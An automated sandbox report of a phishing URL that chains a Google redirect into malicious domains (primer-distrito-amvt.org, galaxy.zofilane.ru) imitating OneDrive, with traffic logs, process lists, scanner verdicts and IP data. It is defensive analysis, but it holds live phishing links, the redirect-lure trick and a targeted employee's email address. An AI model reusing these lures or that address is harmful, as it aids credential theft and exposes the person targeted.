      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /iiuxxyogslrdbqfxkhhhdftmfCAaOSYTIOIATZALRRJPJGMDGANITHJNUOOWODNCP HTTP/1.1Host: 3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://galaxy.zofilane.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://galaxy.zofilane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /iiuxxyogslrdbqfxkhhhdftmfCAaOSYTIOIATZALRRJPJGMDGANITHJNUOOWODNCP HTTP/1.1Host: 3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: onedrive.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galaxy.zofilane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ== HTTP/1.1Host: primer-distrito-amvt.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: www.google.co.ao
      Source: global trafficDNS traffic detected: DNS query: primer-distrito-amvt.org
      Source: global trafficDNS traffic detected: DNS query: galaxy.zofilane.ru
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: 3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru
      Source: global trafficDNS traffic detected: DNS query: www.onedrive.com
      Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
      Source: unknownHTTP traffic detected: POST /report/v4?s=cmBzekPnCyBWZa979Kbu9QCXPGZAUnsyN0kQ1aMnxLccewhNuPrA7eCxLojGUCo6AjY1MbQm2BWXNiP2gLFv6hlEn2EPTDaR7uboSSpTf7RLZEbrjYgRQCbgqtGkT4%2B6hkLvFDU%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 428Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 14 Dec 2024 09:10:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmBzekPnCyBWZa979Kbu9QCXPGZAUnsyN0kQ1aMnxLccewhNuPrA7eCxLojGUCo6AjY1MbQm2BWXNiP2gLFv6hlEn2EPTDaR7uboSSpTf7RLZEbrjYgRQCbgqtGkT4%2B6hkLvFDU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1d0f458d1a42de-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 09:10:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ylwqneu8vNsyMg%2BLXaZO7qrcIRnhD7a%2Bf5mfzj%2F%2FdZkiF39bVYiiRsZFGew7I0NjRhoo5AqAo8fW9P73ADl0ptFH94nsdLWbxVaqQMdtBnihuX45U0m8EXO0yeedkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1170&min_rtt=1079&rtt_var=469&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1513&delivery_rate=2639481&cwnd=251&unsent_bytes=0&cid=196e0549aa7c1b17&ts=399&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8f1d0f6d381d1a03-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1815&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1178&delivery_rate=1608815&cwnd=142&unsent_bytes=0&cid=774686e1e162fda6&ts=1015&x=0"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 09:10:52 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 5OrhhjgKvXeyf4k0tm4AmzGhBSLdpWq8vGQ=$fV6GCaYFApIfoYknServer: cloudflareCF-RAY: 8f1d1032ad90438d-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 09:10:59 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: LXePFKethmg+cCIsSvDHTC4I0LMHMJyctS0=$1dSjiS5ymF4+9mj1Server: cloudflareCF-RAY: 8f1d105eab295e7d-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 09:11:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: ObYZtWJx9jpxNQfu75l2dTTR0fng0ScG53o=$xS+y17GiCvQR1AmvServer: cloudflareCF-RAY: 8f1d109119307c9c-EWRalt-svc: h3=":443"; ma=86400
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: classification engineClassification label: mal64.phis.win@21/27@34/16
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2356,i,11036611443396559380,4828039607253252952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ=="
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2356,i,11036611443396559380,4828039607253252952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==0%Avira URL Cloudsafe
      https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==0%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==100%Avira URL Cloudmalware
      https://3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru/iiuxxyogslrdbqfxkhhhdftmfCAaOSYTIOIATZALRRJPJGMDGANITHJNUOOWODNCP100%Avira URL Cloudmalware
      https://galaxy.zofilane.ru/cdn-cgi/styles/cf.errors.css100%Avira URL Cloudphishing
      https://galaxy.zofilane.ru/favicon.ico100%Avira URL Cloudphishing
      https://galaxy.zofilane.ru/cdn-cgi/images/icon-exclamation.png?1376755637100%Avira URL Cloudphishing
      NameIPActiveMaliciousAntivirus DetectionReputation
      dual-spov-0006.spov-msedge.net
      13.107.137.11
      truefalse
        high
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          code.jquery.com
          151.101.66.137
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              high
              3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru
              172.67.139.11
              truefalse
                unknown
                challenges.cloudflare.com
                104.18.95.41
                truefalse
                  high
                  www.google.com
                  142.250.181.132
                  truefalse
                    high
                    primer-distrito-amvt.org
                    68.70.164.7
                    truefalse
                      unknown
                      galaxy.zofilane.ru
                      104.21.67.40
                      truetrue
                        unknown
                        www.google.co.ao
                        142.250.181.99
                        truefalse
                          high
                          onedrive.live.com
                          unknown
                          unknownfalse
                            high
                            www.onedrive.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8f1d10088a7d4314/1734167450210/38132fcd19d973b837eaa64685b9bff3165b028fbc00b715dad7a1e69f88cde0/YfI4Pgqs8xMmOW1false
                                  high
                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                    high
                                    https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==false
                                      high
                                      https://www.google.co.ao/amp/primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==false
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                          high
                                          http://primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==true
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.jsfalse
                                            high
                                            https://a.nel.cloudflare.com/report/v4?s=b7cY8HkXFqu1hKoGQa3oJNOzYiP%2FmcIAR60wGyytO8OE6E3W1SV9Z7c2NxfJYv8SN%2B7k5IU7OA9PovUg45W3ZuhFTwsMjZ5%2BrhcQtoldX5aHz0VJsIKD8UFCVDem9Q%3D%3Dfalse
                                              high
                                              https://galaxy.zofilane.ru/pD0JM2s/true
                                                unknown
                                                https://galaxy.zofilane.ru/cdn-cgi/styles/cf.errors.cssfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru/iiuxxyogslrdbqfxkhhhdftmfCAaOSYTIOIATZALRRJPJGMDGANITHJNUOOWODNCPfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://galaxy.zofilane.ru/favicon.icofalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/false
                                                  high
                                                  https://galaxy.zofilane.ru/cdn-cgi/images/icon-exclamation.png?1376755637false
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3Vfalse
                                                    high
                                                    https://galaxy.zofilane.ru/pD0JM2s/#Makansha.kanodia@ltimindtree.comfalse
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f1d10088a7d4314&lang=autofalse
                                                        high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8f1d10088a7d4314/1734167450211/C0KkzdsRP1tlIpNfalse
                                                          high
                                                          https://onedrive.live.com/false
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.17.24.14
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            13.107.137.11
                                                            dual-spov-0006.spov-msedge.netUnited States
                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            104.21.67.40
                                                            galaxy.zofilane.ruUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            172.67.211.247
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.18.94.41
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.21.32.251
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.18.95.41
                                                            challenges.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            142.250.181.132
                                                            www.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            172.67.139.11
                                                            3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ruUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            151.101.66.137
                                                            code.jquery.comUnited States
                                                            54113FASTLYUSfalse
                                                            35.190.80.1
                                                            a.nel.cloudflare.comUnited States
                                                            15169GOOGLEUSfalse
                                                            142.250.181.99
                                                            www.google.co.aoUnited States
                                                            15169GOOGLEUSfalse
                                                            104.17.25.14
                                                            cdnjs.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            68.70.164.7
                                                            primer-distrito-amvt.orgUnited States
                                                            22458NETSOURCEUSfalse
                                                            IP
                                                            192.168.2.4
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1575062
                                                            Start date and time:2024-12-14 10:09:00 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 3m 18s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:browseurl.jbs
                                                            Sample URL:https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:8
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal64.phis.win@21/27@34/16
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
